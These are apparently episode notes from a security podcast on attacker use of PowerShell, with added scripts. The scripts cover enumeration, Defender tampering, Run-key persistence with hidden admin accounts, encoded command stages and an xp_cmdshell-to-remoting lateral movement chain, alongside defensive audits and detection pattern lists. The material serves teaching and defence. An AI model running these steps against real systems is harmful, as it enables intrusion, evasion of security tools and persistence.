
Episode 50: How Attackers Use PowerShell

In this episode Spencer and Darrius discuss how cyber adversaries harness the power of PowerShell to orchestrate their malicious activities. Stay tuned for the next episode where we talk about defending and mitigating PowerShell attacks.

The Power of PowerShell

  • 00:28 Cyber adversaries leverage the power of PowerShell to carry out their malicious activities.
  • 00:51 In the next episode, they will explore how defenders can use PowerShell and security tools to detect and mitigate attacks.
  • 01:14 PowerShell is a powerful language that is widely used and loved by many in the IT industry.
  • 01:32 Despite the controls defenders can impose on it, such as script block logging and Constrained Language Mode, PowerShell remains relevant in offensive security.

Personal Experiences with PowerShell

  • 02:10 The hosts share their personal experiences with using PowerShell for automation and administrative tasks.
  • 02:31 They express excitement about discussing both offensive and defensive aspects of using PowerShell.

Ubiquity and Native Integration

  • 03:06 Attackers love using PowerShell because it is ubiquitous in modern Windows environments.
  • 03:28 Its native .NET integration lets attackers call .NET libraries or embed C# directly in their malicious code.
  • 04:49 For offensive purposes, compiling C# in memory with Add-Type or loading a DLL’s bytes with [System.Reflection.Assembly]::Load is common practice, since neither requires the payload to exist as a file on disk.

Note: Timestamps are provided for each bullet point to help locate specific parts of the video.

06:09 Introduction to PowerShell

In this section, the speaker introduces PowerShell and highlights its usefulness for IT administrators. They mention the “Invoke-Command” cmdlet that allows running commands on other systems. PowerShell is beginner-friendly and follows a verb-noun command structure.

PowerShell Features

  • PowerShell provides built-in functionality like “Invoke-Command” and “Invoke-WebRequest” for running commands on remote systems and interacting with web resources.
  • It is beginner-friendly, making it easy to learn and use.
  • PowerShell uses a verb-noun command structure, making it intuitive to understand the purpose of each cmdlet.
  • Scripts are interpreted rather than compiled, which makes rapid prototyping and one-off scripting convenient.
  • PowerShell is commonly used in various attack techniques, such as reconnaissance, lateral movement, privilege escalation, and credential access.

08:16 Common Attacks Using PowerShell

This section discusses common attack scenarios involving PowerShell. The focus is on enumeration, reconnaissance, and leveraging PowerShell’s pipelining ability.

Enumeration and Reconnaissance

  • During penetration tests or attacks, enumeration and reconnaissance are often the initial steps taken.
  • PowerShell excels at these tasks by easily collecting information such as hostname, IP addresses, file shares, registry keys, etc., using scripts or built-in cmdlets.
  • Its pipelining ability allows chaining multiple commands together to filter results or redirect output to files.
  • Attackers leverage these capabilities to find files, enumerate network shares and gather system information quickly.
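Added example, not from the episode: the kind of one-screen enumeration script the hosts describe, built only from in-box cmdlets and the pipeline. It assumes Windows PowerShell 5.1 on Windows 10/Server 2016 or later (for Get-NetIPAddress, Get-SmbShare and Get-LocalGroupMember); the file extensions hunted for and the output paths under $env:TEMP are arbitrary choices for the example.

```powershell
# Added example (not from the episode): host and share enumeration with nothing but the pipeline.
# Assumes Windows PowerShell 5.1 on Windows 10 / Server 2016+ (NetTCPIP, SmbShare and LocalAccounts modules).

$report = [ordered]@{
    Hostname    = $env:COMPUTERNAME
    Domain      = $env:USERDNSDOMAIN
    User        = "$env:USERDOMAIN\$env:USERNAME"
    # Non-loopback IPv4 addresses, one "interface=address" string per adapter
    IPv4        = (Get-NetIPAddress -AddressFamily IPv4 |
                   Where-Object { $_.IPAddress -ne '127.0.0.1' } |
                   ForEach-Object { "$($_.InterfaceAlias)=$($_.IPAddress)" }) -join ';'
    # OS name straight from the registry, no WMI round trip
    OS          = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').ProductName
    # Local shares other than the administrative defaults (C$, ADMIN$, IPC$)
    Shares      = (Get-SmbShare | Where-Object { $_.Name -notmatch '\$$' } |
                   Select-Object -ExpandProperty Name) -join ';'
    # Who can already run as admin on this box
    LocalAdmins = (Get-LocalGroupMember -Group 'Administrators' |
                   Select-Object -ExpandProperty Name) -join ';'
}

# Files an attacker typically hunts for; scoped to the profile tree so it finishes in seconds.
$interesting = Get-ChildItem -Path $env:USERPROFILE -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -in '.kdbx', '.rdp', '.ppk', '.config', '.ps1' -or
                   $_.Name -match 'pass|cred|secret' } |
    Select-Object FullName, Length, LastWriteTime

# Redirect everything to files; Export-Csv keeps the objects intact for later filtering.
[pscustomobject]$report | Export-Csv -Path "$env:TEMP\host.csv"  -NoTypeInformation
$interesting            | Export-Csv -Path "$env:TEMP\files.csv" -NoTypeInformation
```

Every stage is a stock cmdlet, which is exactly why this blends in: the same lines appear in inventory scripts that administrators run on purpose.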

09:58 Handling Output with PowerShell

This section focuses on how attackers abuse PowerShell’s output handling capabilities. It highlights the ease of filtering large JSON objects returned from APIs using PowerShell.

Output Handling

  • With its object-oriented approach, PowerShell makes it easy to handle and filter large JSON objects returned from APIs.
  • Unlike other tools like the AWS CLI, PowerShell provides a simpler way to drill down into objects and extract specific information.
  • PowerShell offers cmdlets like “ConvertFrom-Json” and “ConvertTo-Csv” for converting data formats, making it convenient for creating or manipulating output.
  • PowerShell’s ability to consume APIs and handle output efficiently is advantageous for attackers during reconnaissance, discovery, and enumeration.
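Added example, not from the episode: the JSON drill-down the hosts contrast with the AWS CLI, run against a constructed response. The user names, key IDs and flags below are made up to look like an IAM ListUsers-style result and are not real account data; everything used is in-box in Windows PowerShell 5.1 and PowerShell 7.

```powershell
# Added example (not from the episode). The JSON is constructed to stand in for an API response.
$json = @'
{
  "Users": [
    { "UserName": "alice", "CreateDate": "2021-03-01T10:00:00Z",
      "AccessKeys": [ { "AccessKeyId": "AKIAEXAMPLE0001", "Status": "Active" } ],
      "Groups": ["Developers"], "MfaEnabled": true },
    { "UserName": "bob", "CreateDate": "2019-07-15T08:30:00Z",
      "AccessKeys": [ { "AccessKeyId": "AKIAEXAMPLE0002", "Status": "Active" },
                      { "AccessKeyId": "AKIAEXAMPLE0003", "Status": "Inactive" } ],
      "Groups": ["Admins"], "MfaEnabled": false },
    { "UserName": "svc-backup", "CreateDate": "2018-01-20T12:00:00Z",
      "AccessKeys": [], "Groups": ["Admins", "Backup"], "MfaEnabled": false }
  ]
}
'@

# One cmdlet turns the text into nested objects; from here on it is property access, not text parsing.
$users = ($json | ConvertFrom-Json).Users

# Drill down: privileged users without MFA, and the active keys they still hold.
$targets = $users |
    Where-Object { $_.Groups -contains 'Admins' -and -not $_.MfaEnabled } |
    ForEach-Object {
        [pscustomobject]@{
            UserName   = $_.UserName
            ActiveKeys = ($_.AccessKeys | Where-Object Status -eq 'Active' |
                          Select-Object -ExpandProperty AccessKeyId) -join ';'
            Groups     = $_.Groups -join ';'
        }
    }

# Same objects, different serialisation: CSV for a spreadsheet, JSON for the next tool in the chain.
$targets | ConvertTo-Csv -NoTypeInformation
$targets | ConvertTo-Json -Compress
```

With the AWS CLI the same filter would be a JMESPath --query expression written in one go; here the filter, the nested key extraction and the output format are three separate pipeline stages over the same objects, which is the convenience the hosts are pointing at.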

11:26 Abusing PowerShell for Defense Evasion

This section discusses how attackers abuse PowerShell to evade defense mechanisms. It highlights disabling Windows Defender as an example.

Defense Evasion

  • Attackers commonly abuse PowerShell to disable Windows Defender using cmdlets like “Set-MpPreference.”
  • Various cmdlets in PowerShell allow administrators to manage Windows Defender settings, including disabling real-time monitoring, adding exclusions or deleting signatures.
  • Attackers can delete Defender signatures and keep re-deleting them with a simple loop, leaving the engine with nothing to match against and evading detection by the security solution.

Note: The transcript provided does not cover the entire video.

12:32 PowerShell Defender Cmdlets

This section discusses the availability and usage of PowerShell’s Defender cmdlets, which can be used to bypass security measures.

PowerShell’s Ubiquity and Availability

  • The Defender module and its cmdlets (Get-MpPreference, Set-MpPreference and friends) are present on the system whether or not Defender is the active antivirus, so the attacker does not have to bring anything with them.
  • Reading the preferences works as a standard user; changing them with Set-MpPreference or Add-MpPreference requires administrative access, and Tamper Protection can block the change even then.
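Added example, not from the episode, covering both the 11:26 and 12:32 sections: the Set-MpPreference changes an attacker makes, shown commented out so the block changes nothing, followed by the audit a defender can run against the same preference object and Defender’s own event log. It assumes the Defender module on Windows 10/Server 2016 or later; the event IDs are the ones Microsoft documents for the Microsoft-Windows-Windows Defender/Operational log, and the three-day signature-age threshold is an arbitrary choice.

```powershell
# Added example (not from the episode). Attacker side is commented out; the audit below is live.
# Requires the Defender module; Set-MpPreference needs an elevated prompt.

# --- Attacker side -----------------------------------------------------------------
# Set-MpPreference -DisableRealtimeMonitoring $true
# Set-MpPreference -DisableIOAVProtection $true          # stop scanning downloaded files
# Add-MpPreference -ExclusionPath 'C:\Users\Public'       # carve out a staging directory
# & "$env:ProgramFiles\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All   # wipe signatures

# --- Defender side: audit the preference object for exactly those changes ----------
function Test-MpTampering {
    $pref     = Get-MpPreference
    $status   = Get-MpComputerStatus
    $findings = @()

    foreach ($name in 'DisableRealtimeMonitoring', 'DisableIOAVProtection',
                      'DisableBehaviorMonitoring', 'DisableScriptScanning') {
        if ($pref.$name) { $findings += "$name is set" }
    }
    if ($pref.ExclusionPath)    { $findings += "Path exclusions: $($pref.ExclusionPath -join ';')" }
    if ($pref.ExclusionProcess) { $findings += "Process exclusions: $($pref.ExclusionProcess -join ';')" }
    if (-not $status.RealTimeProtectionEnabled) { $findings += 'Real-time protection reports disabled' }
    # Old signatures usually mean updates were blocked or definitions were removed (threshold is arbitrary)
    if ($status.AntivirusSignatureAge -gt 3) {
        $findings += "Signatures are $($status.AntivirusSignatureAge) days old"
    }
    if (-not $status.IsTamperProtected) { $findings += 'Tamper Protection is off' }
    return $findings
}

# Corroborate with Defender's own log: 5001 real-time protection disabled, 5004 real-time
# configuration changed, 5010 malware scanning disabled, 5013 Tamper Protection blocked a change.
function Get-MpTamperEvents([int]$Days = 7) {
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004, 5010, 5013
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, Message
}

Test-MpTampering
Get-MpTamperEvents | Format-Table -AutoSize -Wrap
```

The preference check catches the end state; the event query catches the moment of change, including attempts that Tamper Protection refused, which is the signal worth alerting on.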

Bypassing AMSI with PowerShell

  • AMSI (Antimalware Scan Interface) bypasses are commonly used in offensive security and malware development.
  • Many AMSI bypasses are created in PowerShell or ported to it from other languages.
  • New bypass methods for AMSI are frequently discovered, making it a cat-and-mouse game between attackers and defenders.

Importance of PowerShell Logging

  • Enabling and monitoring PowerShell logging is crucial for detecting malicious activities.
  • Attackers often disable PowerShell logging or clear event logs to cover their tracks.
  • Clearing event logs should trigger alerts as it indicates suspicious activity.
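Added example, not from the episode: a detection pass over the two log sources the hosts say matter, script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) and the log-cleared events (1102 in Security, 104 in System), plus a check that script block logging has not been switched off in policy. The indicator list is illustrative and deliberately short; reading the Security log requires an elevated prompt.

```powershell
# Added example (not from the episode). Indicator strings are illustrative, not a complete list.

function Test-ScriptBlockLoggingEnabled {
    # Attackers flip this policy value to 0; if it is missing or 0, 4104 events stop appearing.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $v = (Get-ItemProperty -Path $key -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    return ($v -eq 1)
}

function Find-SuspiciousScriptBlocks {
    param([int]$Days = 1)
    $patterns = @(
        'AmsiUtils', 'amsiInitFailed', 'AmsiScanBuffer',              # common AMSI bypass touch points
        'Set-MpPreference', 'Add-MpPreference', 'RemoveDefinitions',    # Defender tampering
        'FromBase64String', '-EncodedCommand', ' -enc ', ' -ec ',       # encoded stages
        'System.Reflection.Assembly', 'Invoke-Expression', 'IEX(',      # in-memory loading
        'Clear-EventLog', 'wevtutil'                                    # anti-forensics
    )
    $regex = ($patterns | ForEach-Object { [regex]::Escape($_) }) -join '|'

    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
    ForEach-Object {
        # In a 4104 record Properties[2] is the ScriptBlockText field
        $text = [string]$_.Properties[2].Value
        if (-not $text) { return }
        $hits = [regex]::Matches($text, $regex, 'IgnoreCase') | ForEach-Object Value | Sort-Object -Unique
        if ($hits) {
            [pscustomobject]@{
                Time       = $_.TimeCreated
                ProcessId  = $_.ProcessId
                Indicators = $hits -join ','
                Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

function Find-LogClearing {
    param([int]$Days = 7)
    # 1102 (Security) and 104 (System) are the "log was cleared" events; either should page someone.
    $filters = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = (Get-Date).AddDays(-$Days) },
        @{ LogName = 'System';   Id = 104;  StartTime = (Get-Date).AddDays(-$Days) }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            Select-Object TimeCreated, LogName, Id, @{ n = 'Actor'; e = { $_.UserId } }, Message
    }
}

"Script block logging enabled: $(Test-ScriptBlockLoggingEnabled)"
Find-SuspiciousScriptBlocks | Format-Table -AutoSize -Wrap
Find-LogClearing            | Format-Table -AutoSize -Wrap
```

A string-match list like this is a starting point, not a detection strategy; the durable signal is the combination of the logging policy being off, a gap in 4104 volume and a 1102 or 104 event, which is the sequence an attacker produces when covering tracks.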

15:13 Execution Techniques in PowerShell

This section focuses on various execution techniques used by attackers in PowerShell.

Downloading Additional Tools

  • Attackers use PowerShell to download additional tools onto the compromised host or load them into memory.
  • Commonly downloaded tools include PowerView, used for Active Directory reconnaissance.

Fileless Malware Attacks

  • Encoded PowerShell commands are frequently used in different stages of an infection chain.
  • Loading binaries into memory instead of writing them to disk helps evade detection by traditional antivirus solutions.

Role of PowerShell in Fileless Malware Attacks

  • Fileless malware attacks leverage scripting engines already on the host, such as VBA macros in Office documents, JScript and PowerShell itself.
  • AMSI helps detect fileless attacks by scanning script content before it runs, but it has limitations that attackers exploit.

Infection Chain Examples

  • Phishing emails often contain malicious Word documents that download additional files or execute encoded PowerShell commands.
  • Base64 encoding is commonly used to obfuscate PowerShell commands in an infection chain.
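Added example, not from the episode: how the Base64 stage in an infection chain is produced and, for the analyst, reversed, plus the Add-Type mechanism behind in-memory C# loading. The stage-one script below is a constructed, benign stand-in for the real payload, and the launcher string is what a macro would hand to a shell; it assumes Windows PowerShell 5.1 (Add-Type uses the in-box C# compiler there, the Roslyn compiler in PowerShell 7).

```powershell
# Added example (not from the episode). The payload here is a harmless placeholder.

# --- Building an -EncodedCommand stage -------------------------------------------
# powershell.exe expects UTF-16LE base64, not UTF-8; getting this wrong is the usual mistake.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

# --- Reversing it, including nested layers --------------------------------------
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    $text = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
    # Stages are often nested ("powershell -enc <more base64>"); keep peeling while one is present.
    $inner = [regex]::Match($text, '(?i)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})')
    if ($inner.Success) {
        return $text + "`n--- decoded inner layer ---`n" + (ConvertFrom-EncodedCommand $inner.Groups[1].Value)
    }
    return $text
}

# Constructed stage-one script: benign on purpose.
$stage1   = "Write-Host 'stage 1'; Get-Process | Select-Object -First 3"
$encoded  = ConvertTo-EncodedCommand $stage1
$launcher = "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $encoded"   # what a macro would run
$launcher

# Analyst view: the blob from the macro, the 4104 log or the 4688 command line, back to readable PowerShell.
ConvertFrom-EncodedCommand $encoded

# --- C# in memory ----------------------------------------------------------------
# Add-Type compiles the source and loads the resulting assembly into this process only; no DLL is
# placed on disk. Loaders do the same with pre-built bytes via [System.Reflection.Assembly]::Load([byte[]]).
$src = @'
public static class Demo {
    public static string Whoami() {
        return System.Security.Principal.WindowsIdentity.GetCurrent().Name;
    }
}
'@
Add-Type -TypeDefinition $src -Language CSharp
[Demo]::Whoami()
```

Note that nothing about the encoding hides the content from script block logging: the 4104 event records the decoded script as it executes, which is why disabling that logging is the attacker’s next step.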


19:00 Persistence Techniques in PowerShell

In this section, the speaker discusses various persistence techniques using PowerShell.

Modifying Registry Keys for Persistence

  • Threat actors often modify registry keys to achieve persistence.
  • By storing an encoded payload in a registry value and pointing a Run key at a one-liner that reads and executes it, they can run their code in memory on every logon without a script file on disk.

Using PowerShell Scripts for Persistence

  • The speaker mentions using PowerShell scripts to find privilege escalation opportunities within scheduled tasks.
  • Scheduled tasks can suffer from unquoted executable paths, the same weakness found in services.
  • PowerShell scripts can be used to enumerate hosts and identify vulnerable scheduled tasks or services that can be abused.

Modifying the Registry and Creating Accounts

  • Modifying the registry is another example of achieving persistence using PowerShell.
  • Built-in PowerShell cmdlets (New-LocalUser, Add-LocalGroupMember) can be used to create new accounts and add members to the local Administrators group.
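Added example, not from the episode, covering the three persistence items above: the registry, scheduled-task and account techniques as an attacker would run them (commented out, with a benign placeholder payload and a hypothetical key name and account), followed by live audit functions that enumerate Run keys, unquoted service and task paths, and local administrators. It assumes Windows PowerShell 5.1 on Windows 10/Server 2016 or later; the indicator regex for Run entries is illustrative.

```powershell
# Added example (not from the episode). Attacker lines are commented out; the audits below are live.

# --- Attacker side (for recognition) -------------------------------------------
# The script body lives in an innocuous registry value; the Run entry only reads and runs it.
# $payload = "Write-Host 'hello from the registry'"            # benign stand-in for the real payload
# $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
# New-Item -Path 'HKCU:\Software\Contoso' -Force | Out-Null    # hypothetical vendor-looking key
# Set-ItemProperty -Path 'HKCU:\Software\Contoso' -Name 'Config' -Value $b64
# Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' `
#   -Value 'powershell.exe -w hidden -c "IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Contoso).Config)))"'
# New-LocalUser -Name 'svc_help' -Password (Read-Host -AsSecureString) -PasswordNeverExpires
# Add-LocalGroupMember -Group 'Administrators' -Member 'svc_help'

# --- Audit 1: Run / RunOnce entries ------------------------------------------------
function Get-RunKeyEntries {
    $keys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($k in $keys) {
        $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }          # skip PSPath, PSParentPath, ...
            $cmd = [string]$p.Value
            # Entries that launch a script host, pull data out of the registry or decode base64 are the tell.
            $suspicious = $cmd -match 'powershell|pwsh|-enc|FromBase64String|Get-ItemProperty|IEX|Invoke-Expression|mshta|wscript|rundll32'
            [pscustomobject]@{ Key = $k; Name = $p.Name; Command = $cmd; Suspicious = $suspicious }
        }
    }
}

# --- Audit 2: unquoted paths in services and scheduled tasks ----------------------
function Find-UnquotedPaths {
    # Services: PathName starts with the binary; unquoted plus a space means CreateProcess ambiguity.
    $svc = Get-CimInstance Win32_Service | ForEach-Object {
        $p = $_.PathName
        if ($p -and $p -notmatch '^"' -and $p -match '^(.*?\.exe)' -and $matches[1] -match '\s') {
            [pscustomobject]@{ Kind = 'Service'; Name = $_.Name; Path = $p }
        }
    }
    # Scheduled tasks: Execute holds only the program (arguments are a separate field), same test.
    $tasks = Get-ScheduledTask | ForEach-Object {
        $t = $_
        foreach ($a in $t.Actions) {
            $e = $a.Execute
            if ($e -and $e -notmatch '^"' -and $e -match '\\' -and $e -match '\s') {
                [pscustomobject]@{ Kind = 'Task'; Name = "$($t.TaskPath)$($t.TaskName)"; Path = $e }
            }
        }
    }
    @($svc) + @($tasks)
}

# --- Audit 3: who is in the local Administrators group -----------------------------
function Get-LocalAdmins {
    Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, ObjectClass, PrincipalSource
}

Get-RunKeyEntries | Where-Object Suspicious | Format-Table -AutoSize -Wrap
Find-UnquotedPaths | Format-Table -AutoSize
Get-LocalAdmins    | Format-Table -AutoSize
```

An unquoted path only matters if a lower-privileged user can write to one of the directories along it, so the finding from Find-UnquotedPaths still needs an ACL check (Get-Acl on each path prefix) before it counts as escalation; the audit narrows the list, it does not prove the bug.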

Ubiquity of PowerShell

  • The ubiquity of PowerShell makes it a popular choice for attackers.
  • It allows them to perform various actions and blend in with legitimate activity on Windows systems.

22:11 Lateral Movement with PowerShell Remoting

This section focuses on lateral movement techniques using PowerShell remoting.

PowerShell Remoting as a Lateral Movement Technique

  • PowerShell remoting and its cmdlets are commonly used for lateral movement by attackers.
  • It provides an alternative to traditional methods like PsExec or custom services.

Blending In with Built-in Windows Tools

  • Attackers can leverage built-in Windows tools like PowerShell to blend in with legitimate activity on compromised hosts.
  • This makes detection more challenging for defenders who may not easily differentiate between malicious and normal usage of PowerShell.

23:22 Chaining Techniques for Lateral Movement

The speaker discusses an interesting engagement where chaining different techniques was attempted for lateral movement.

Chaining xp_cmdshell and PowerShell

  • In a specific engagement, the team chained SQL Server’s xp_cmdshell with PowerShell remoting for lateral movement.
  • They started by gaining access to SQL Server and enabling xp_cmdshell.
  • Then, they used PowerShell remoting from the SQL host to connect to another system where they had admin rights.

Blending In with Built-in Windows Tools

  • The use of built-in Windows tools like PowerShell helps attackers blend in and evade detection.
  • By avoiding custom services or tools like Cobalt Strike Beacon, attackers can leverage the ubiquity of PowerShell for their operations.


25:33 Why Learn PowerShell

In this section, the speaker discusses the importance of understanding PowerShell and its applications in IT and cybersecurity. They emphasize the benefits of learning PowerShell for automation, offensive security, defensive security, and tool development.

PowerShell Remoting Sessions

  • The speaker mentions that quoting, escaping, and other details need to be handled correctly when running commands through PowerShell remoting sessions, especially when another layer such as a SQL or cmd shell sits in front of them.
  • This part of the discussion highlights how PowerShell can be used for various tasks.
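Added example, not from the episode, for the 22:11 and 23:22 sections and the quoting remark above: the xp_cmdshell to PowerShell-remoting chain the hosts describe, with the three colliding quoting layers (T-SQL, cmd.exe, PowerShell) side-stepped by encoding the inner script once. SQLHOST, TARGET, CORP\admin and the password are hypothetical placeholders; it assumes Windows PowerShell 5.1, a SQL login with sysadmin on SQLHOST, a Windows credential with local admin on TARGET, and WinRM reachable from the SQL host.

```powershell
# Added example (not from the episode). All host names and credentials are placeholders.
$sqlServer = 'SQLHOST'   # hypothetical
$target    = 'TARGET'    # hypothetical

$conn = New-Object System.Data.SqlClient.SqlConnection("Server=$sqlServer;Database=master;Integrated Security=True")
$conn.Open()

function Invoke-Sql([string]$Query) {
    $cmd = $conn.CreateCommand()
    $cmd.CommandText = $Query
    $reader = $cmd.ExecuteReader()
    $rows = while ($reader.Read()) { $reader.GetValue(0) }   # xp_cmdshell returns one row per output line
    $reader.Close()
    $rows
}

# 1. Enable xp_cmdshell (needs sysadmin; 'show advanced options' has to be on first).
Invoke-Sql "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"

# 2. The script the SQL host should run: remoting to the next box with an explicit credential,
#    because xp_cmdshell executes as the SQL Server service account, not as us.
$inner = @'
$pw   = ConvertTo-SecureString 'Pa$$w0rd' -AsPlainText -Force          # placeholder password
$cred = New-Object System.Management.Automation.PSCredential('CORP\admin', $pw)
Invoke-Command -ComputerName __TARGET__ -Credential $cred -ScriptBlock { hostname; whoami }
'@ -replace '__TARGET__', $target

# 3. Encoding removes every quote from what cmd.exe and T-SQL see, so no hand escaping is needed.
$encoded   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$osCommand = "powershell.exe -NoProfile -NonInteractive -EncodedCommand $encoded"

# 4. The only T-SQL escaping left is doubling single quotes; the encoded string has none, but keep
#    the Replace so the helper stays correct for commands that do.
$escaped = $osCommand.Replace("'", "''")
Invoke-Sql "EXEC master..xp_cmdshell '$escaped';"

$conn.Close()
```

Two caveats a practitioner hits immediately: xp_cmdshell’s argument is limited to nvarchar(4000), so a long inner script has to be fetched rather than inlined; and every piece of this chain is logged by default somewhere (the sp_configure change in SQL Server, the encoded command line in a 4688 event if command-line auditing is on, the decoded script in 4104, and the WinRM logon on TARGET), which is the thread the next episode on defence picks up.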

Potato Exploits and C#

  • The Potato family of privilege escalation exploits is mentioned as an example of tooling written in C#, a language closely related to PowerShell.
  • The speaker notes that PowerShell and C# are tightly coupled, both running on .NET.

Importance of Learning PowerShell

  • Learning PowerShell is highly recommended for individuals in the IT or cybersecurity space.
  • Benefits include automating tasks without others knowing, offensive security practices, defensive security measures, and overall professional growth.

Offensive Use of PowerShell

  • There is potential for another episode discussing how offensive security professionals use PowerShell for automating tasks or developing their own tools.
  • This aspect was not covered extensively in this episode focused on attackers abusing PowerShell.

Defensive Use of PowerShell

  • Similarly, there is potential to explore how administrators use PowerShell for enumeration scripts, full-fledged tool development, automation, and other defensive purposes.

Blog: https://offsec.blog/
Youtube: https://www.youtube.com/@cyberthreatpov
Twitter: https://twitter.com/cyberthreatpov
Work with Us: https://securit360.com